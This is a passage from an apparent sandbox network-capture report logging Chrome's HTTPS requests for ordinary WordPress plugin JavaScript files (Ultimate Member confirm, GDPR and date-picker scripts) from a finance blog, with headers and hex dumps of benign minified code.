                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC758INData Raw: 74 3d 3d 64 6f 63 75 6d 65 6e 74 29 72 65 74 75 72 6e 20 31 7d 28 74 29 7c 7c 61 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 28 29 7d 29 7d 2c 61 2e 66 6e 2e 74 69 70 73 79 2e 65 6c 65 6d 65 6e 74 4f 70 74 69 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 61 2e 6d 65 74 61 64 61 74 61 3f 61 2e 65 78 74 65 6e 64 28 7b 7d 2c 65 2c 61 28 74 29 2e 6d 65 74 61 64 61 74 61 28 29 29 3a 65 7d 2c 61 2e 66 6e 2e 74 69 70 73 79 2e 61 75 74 6f 4e 53 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 28 74 68 69 73 29 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 3e 61 28 64 6f 63 75 6d 65 6e 74 29 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2b 61 28 77 69 6e 64 6f 77 29 2e 68 65 69 67 68 74 28 29 2f 32 3f 22 73 22 3a 22 6e 22 7d 2c 61 2e 66 6e 2e 74
                                                                                                                                                                                                                                                                        Data Ascii: t==document)return 1}(t)||a(this).remove()})},a.fn.tipsy.elementOptions=function(t,e){return a.metadata?a.extend({},e,a(t).metadata()):e},a.fn.tipsy.autoNS=function(){return a(this).offset().top>a(document).scrollTop()+a(window).height()/2?"s":"n"},a.fn.t
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        47192.168.2.449797141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:49 UTC806OUTGET /wp-content/plugins/ultimate-member/assets/libs/um-confirm/um-confirm.min.js?ver=1.0 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-a6e"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147807
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9de3eaf72ab-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC878INData Raw: 61 36 65 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 69 2c 6e 3d 7b 6d 65 73 73 61 67 65 3a 22 22 2c 79 65 73 5f 6c 61 62 65 6c 3a 22 59 65 73 22 2c 6e 6f 5f 6c 61 62 65 6c 3a 22 4e 6f 22 7d 2c 6d 3d 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 3d 74 2e 65 78 74 65 6e 64 28 7b 7d 2c 6e 2c 6f 29 2c 74 28 74 68 69 73 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 74 68 69 73 29 2e 64 61 74 61 28 22 6f 70 74 69 6f 6e 73 22 2c 69 29 2c 6d 2e 62 75 69 6c 64 2e 61 70 70 6c 79 28 74 28 74 68 69 73 29 2c 5b 69 5d 29 2c 74 28 74 68 69 73 29 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 76 61 72 20 69 3d 74 28 74 68 69 73 29 2e 64 61 74 61 28 22 6f 70 74 69 6f 6e 73 22 29 3b 74 28 22 23 75 6d 5f 63 6f 6e 66 69 72 6d
                                                                                                                                                                                                                                                                        Data Ascii: a6e!function(t){var i,n={message:"",yes_label:"Yes",no_label:"No"},m={init:function(o){i=t.extend({},n,o),t(this).each(function(){t(this).data("options",i),m.build.apply(t(this),[i]),t(this).click(function(o){var i=t(this).data("options");t("#um_confirm
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 75 74 74 6f 6e 5f 79 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 74 28 22 23 75 6d 5f 63 6f 6e 66 69 72 6d 5f 62 6c 6f 63 6b 22 29 2e 64 61 74 61 28 22 6f 62 6a 22 29 3b 6d 2e 79 65 73 2e 61 70 70 6c 79 28 6f 29 7d 29 2c 74 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 23 75 6d 5f 63 6f 6e 66 69 72 6d 5f 62 75 74 74 6f 6e 5f 6e 6f 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 74 28 22 23 75 6d 5f 63 6f 6e 66 69 72 6d 5f 62 6c 6f 63 6b 22 29 2e 64 61 74 61 28 22 6f 62 6a 22 29 3b 6d 2e 6e 6f 2e 61 70 70 6c 79 28 6f 29 7d 29 2c 74 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 23 75 6d 5f 63 6f 6e 66 69 72 6d 5f 62 6c 6f 63 6b 5f 62 61 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76
                                                                                                                                                                                                                                                                        Data Ascii: utton_yes",function(){var o=t("#um_confirm_block").data("obj");m.yes.apply(o)}),t(document).on("click","#um_confirm_button_no",function(){var o=t("#um_confirm_block").data("obj");m.no.apply(o)}),t(document).on("click","#um_confirm_block_back",function(){v
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC430INData Raw: 70 65 6f 66 20 6f 26 26 6f 3f 76 6f 69 64 20 74 2e 65 72 72 6f 72 28 22 4d 65 74 68 6f 64 20 22 2b 6f 2b 22 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 20 66 6f 72 20 6a 51 75 65 72 79 2e 75 6d 5f 63 6f 6e 66 69 72 6d 20 70 6c 75 67 69 6e 22 29 3a 6d 2e 69 6e 69 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 74 2e 75 6d 5f 63 6f 6e 66 69 72 6d 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 3d 74 2e 65 78 74 65 6e 64 28 7b 7d 2c 6e 2c 6f 29 2c 74 28 6f 2e 6f 62 6a 65 63 74 29 2e 64 61 74 61 28 22 6f 70 74 69 6f 6e 73 22 2c 69 29 2c 6d 2e 62 75 69 6c 64 2e 61 70 70 6c 79 28 74 28 6f 2e 6f 62 6a 65 63 74 29 2c 5b 69 5d 29 2c 69 2e 74 69 74 6c 65 26 26 74 28 22 23 75 6d 5f 63 6f 6e 66 69 72 6d 5f 74 69 74 6c 65 22 29 2e 68 74 6d 6c 28
                                                                                                                                                                                                                                                                        Data Ascii: peof o&&o?void t.error("Method "+o+" does not exist for jQuery.um_confirm plugin"):m.init.apply(this,arguments)},t.um_confirm=function(o){i=t.extend({},n,o),t(o.object).data("options",i),m.build.apply(t(o.object),[i]),i.title&&t("#um_confirm_title").html(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        48192.168.2.449802141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:49 UTC578OUTGET /wp-content/plugins/ultimate-member/assets/js/um-gdpr.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-184"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147807
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9de3bf941a1-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC395INData Raw: 31 38 34 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 61 2e 75 6d 2d 74 6f 67 67 6c 65 2d 67 64 70 72 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2c 74 3d 65 2e 63 6c 6f 73 65 73 74 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 61 72 65 61 22 29 2c 67 3d 74 2e 66 69 6e 64 28 22 2e 75 6d 2d 67 64 70 72 2d 63 6f 6e 74 65 6e 74 22 29 3b 67 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 3f 28 74 2e 66 69 6e 64 28 22 61 2e 75 6d 2d 74 6f 67 67 6c 65 2d 67 64 70 72 22 29 2e 74 65 78 74 28 65 2e 64 61 74 61 28 22 74 6f 67 67 6c 65 2d 73 68 6f 77 22 29 29 2c 67 2e 68 69 64 65 28 29 2e 66 69 6e 64 28 22 61 2e 75 6d 2d 74 6f 67 67 6c 65 2d 67 64
                                                                                                                                                                                                                                                                        Data Ascii: 184jQuery(document).on("click","a.um-toggle-gdpr",function(e){var e=jQuery(e.currentTarget),t=e.closest(".um-field-area"),g=t.find(".um-gdpr-content");g.is(":visible")?(t.find("a.um-toggle-gdpr").text(e.data("toggle-show")),g.hide().find("a.um-toggle-gd
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        49192.168.2.449804141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC803OUTGET /wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.min.js?ver=3.6.2 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-2074"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147807
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9df99bf4392-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC877INData Raw: 32 30 37 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 70 69 63 6b 65 72 22 2c 5b 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 74 68 69 73 2e 50 69 63 6b 65 72 3d 65 28 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6f 3d 68 28 77 69 6e 64 6f 77 29 2c 6d 3d 68 28 64 6f 63 75 6d 65 6e 74 29 2c 72 3d 68 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 2c 67 3d 6e 75 6c 6c 21 3d 64 6f 63 75
                                                                                                                                                                                                                                                                        Data Ascii: 2074!function(e){"function"==typeof define&&define.amd?define("picker",["jquery"],e):"object"==typeof exports?module.exports=e(require("jquery")):this.Picker=e(jQuery)}(function(h){var o=h(window),m=h(document),r=h(document.documentElement),g=null!=docu
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 6c 28 29 2c 73 2e 66 6f 72 6d 61 74 53 75 62 6d 69 74 26 26 28 21 30 3d 3d 3d 73 2e 68 69 64 64 65 6e 4e 61 6d 65 3f 28 65 3d 72 2e 6e 61 6d 65 2c 72 2e 6e 61 6d 65 3d 22 22 29 3a 65 3d 28 65 3d 5b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 73 2e 68 69 64 64 65 6e 50 72 65 66 69 78 3f 73 2e 68 69 64 64 65 6e 50 72 65 66 69 78 3a 22 22 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 73 2e 68 69 64 64 65 6e 53 75 66 66 69 78 3f 73 2e 68 69 64 64 65 6e 53 75 66 66 69 78 3a 22 5f 73 75 62 6d 69 74 22 5d 29 5b 30 5d 2b 72 2e 6e 61 6d 65 2b 65 5b 31 5d 2c 75 2e 5f 68 69 64 64 65 6e 3d 68 28 27 3c 69 6e 70 75 74 20 74 79 70 65 3d 68 69 64 64 65 6e 20 6e 61 6d 65 3d 22 27 2b 65 2b 27 22 27 2b 28 63 2e 64 61 74 61 28 22 76 61 6c 75 65 22 29 7c 7c 72
                                                                                                                                                                                                                                                                        Data Ascii: l(),s.formatSubmit&&(!0===s.hiddenName?(e=r.name,r.name=""):e=(e=["string"==typeof s.hiddenPrefix?s.hiddenPrefix:"","string"==typeof s.hiddenSuffix?s.hiddenSuffix:"_submit"])[0]+r.name+e[1],u._hidden=h('<input type=hidden name="'+e+'"'+(c.data("value")||r
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 2c 72 2e 61 75 74 6f 66 6f 63 75 73 26 26 75 2e 6f 70 65 6e 28 29 2c 75 2e 74 72 69 67 67 65 72 28 22 73 74 61 72 74 22 29 2e 74 72 69 67 67 65 72 28 22 72 65 6e 64 65 72 22 29 29 7d 2c 72 65 6e 64 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 3f 28 75 2e 24 68 6f 6c 64 65 72 3d 68 28 61 28 29 29 2c 6c 28 29 2c 75 2e 24 72 6f 6f 74 2e 68 74 6d 6c 28 75 2e 24 68 6f 6c 64 65 72 29 29 3a 75 2e 24 72 6f 6f 74 2e 66 69 6e 64 28 22 2e 22 2b 69 2e 62 6f 78 29 2e 68 74 6d 6c 28 75 2e 63 6f 6d 70 6f 6e 65 6e 74 2e 6e 6f 64 65 73 28 64 2e 6f 70 65 6e 29 29 2c 75 2e 74 72 69 67 67 65 72 28 22 72 65 6e 64 65 72 22 29 7d 2c 73 74 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 2e 73 74 61 72 74 26 26 28 75 2e 63 6c 6f 73 65 28
                                                                                                                                                                                                                                                                        Data Ascii: ,r.autofocus&&u.open(),u.trigger("start").trigger("render"))},render:function(e){return e?(u.$holder=h(a()),l(),u.$root.html(u.$holder)):u.$root.find("."+i.box).html(u.component.nodes(d.open)),u.trigger("render")},stop:function(){return d.start&&(u.close(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 26 26 75 2e 63 6c 6f 73 65 28 21 30 29 29 29 7d 29 29 2c 75 2e 74 72 69 67 67 65 72 28 22 6f 70 65 6e 22 29 29 7d 2c 63 6c 6f 73 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 28 73 2e 65 64 69 74 61 62 6c 65 3f 72 2e 66 6f 63 75 73 28 29 3a 28 75 2e 24 68 6f 6c 64 65 72 2e 6f 66 66 28 22 66 6f 63 75 73 2e 74 6f 4f 70 65 6e 22 29 2e 66 6f 63 75 73 28 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 75 2e 24 68 6f 6c 64 65 72 2e 6f 6e 28 22 66 6f 63 75 73 2e 74 6f 4f 70 65 6e 22 2c 66 29 7d 2c 30 29 29 29 2c 63 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2e 61 63 74 69 76 65 29 2c 24 28 72 2c 22 65 78 70 61 6e 64 65 64 22 2c 21 31 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 75 2e 24
                                                                                                                                                                                                                                                                        Data Ascii: &&u.close(!0)))})),u.trigger("open"))},close:function(e){return e&&(s.editable?r.focus():(u.$holder.off("focus.toOpen").focus(),setTimeout(function(){u.$holder.on("focus.toOpen",f)},0))),c.removeClass(i.active),$(r,"expanded",!1),setTimeout(function(){u.$
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 6d 65 73 43 6f 75 6e 74 3b 6e 2b 3d 31 29 28 65 3d 74 5b 6e 5d 29 69 6e 20 64 2e 6d 65 74 68 6f 64 73 26 26 64 65 6c 65 74 65 20 64 2e 6d 65 74 68 6f 64 73 5b 65 5d 3b 72 65 74 75 72 6e 20 75 7d 2c 74 72 69 67 67 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 28 65 3d 64 2e 6d 65 74 68 6f 64 73 5b 65 5d 29 26 26 65 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 2e 5f 2e 74 72 69 67 67 65 72 28 65 2c 75 2c 5b 74 5d 29 7d 29 7d 72 65 74 75 72 6e 20 6e 28 22 5f 22 2b 65 29 2c 6e 28 65 29 2c 75 7d 7d 2c 6e 65 77 20 65 29 3a 76 3b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 72 65 74 75 72 6e 20 76 2e 5f 2e 6e 6f 64 65 28 22 64 69 76 22 2c 76 2e 5f 2e 6e 6f 64 65 28 22 64 69 76 22 2c 76 2e 5f 2e 6e 6f 64 65 28 22
                                                                                                                                                                                                                                                                        Data Ascii: mesCount;n+=1)(e=t[n])in d.methods&&delete d.methods[e];return u},trigger:function(e,t){function n(e){(e=d.methods[e])&&e.map(function(e){v._.trigger(e,u,[t])})}return n("_"+e),n(e),u}},new e):v;function a(){return v._.node("div",v._.node("div",v._.node("
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 26 75 2e 63 6f 6d 70 6f 6e 65 6e 74 2e 6b 65 79 5b 74 5d 29 26 26 28 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 6e 3f 75 2e 63 6c 65 61 72 28 29 2e 63 6c 6f 73 65 28 29 3a 75 2e 6f 70 65 6e 28 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 79 28 29 7b 69 66 28 72 2e 68 65 69 67 68 74 28 29 3c 3d 6f 2e 68 65 69 67 68 74 28 29 29 72 65 74 75 72 6e 20 30 3b 76 61 72 20 65 3d 68 28 27 3c 64 69 76 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 77 69 64 74 68 3a 31 30 30 70 78 22 20 2f 3e 27 29 2e 61 70 70 65 6e 64 54 6f 28 22 62 6f 64 79 22 29 2c 74 3d 65 5b 30 5d 2e 6f 66 66 73 65 74 57 69 64 74 68 3b 65 2e 63 73 73 28 22 6f 76 65 72 66 6c 6f 77 22 2c 22 73 63 72
                                                                                                                                                                                                                                                                        Data Ascii: &u.component.key[t])&&(e.preventDefault(),e.stopPropagation(),n?u.clear().close():u.open())}}function y(){if(r.height()<=o.height())return 0;var e=h('<div style="visibility:hidden;width:100px" />').appendTo("body"),t=e[0].offsetWidth;e.css("overflow","scr
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC594INData Raw: 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 2f 5c 64 2f 2e 74 65 73 74 28 65 5b 31 5d 29 3f 32 3a 31 7d 2c 69 73 44 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 2d 31 3c 7b 7d 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 44 61 74 65 22 29 26 26 74 68 69 73 2e 69 73 49 6e 74 65 67 65 72 28 65 2e 67 65 74 44 61 74 65 28 29 29 7d 2c 69 73 49 6e 74 65 67 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 2d 31 3c 7b 7d 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 4e 75 6d 62 65 72 22 29 26 26 65 25 31 3d 3d 30 7d 2c 61 72 69 61 41 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 68 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 65 29 7c 7c 28 65 3d
                                                                                                                                                                                                                                                                        Data Ascii: nction(e){return/\d/.test(e[1])?2:1},isDate:function(e){return-1<{}.toString.call(e).indexOf("Date")&&this.isInteger(e.getDate())},isInteger:function(e){return-1<{}.toString.call(e).indexOf("Number")&&e%1==0},ariaAttr:function(e,t){h.isPlainObject(e)||(e=
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        50192.168.2.449805141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC563OUTGET /wp-content/cache/min/1/printfriendly.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC492INHTTP/1.1 200 OK
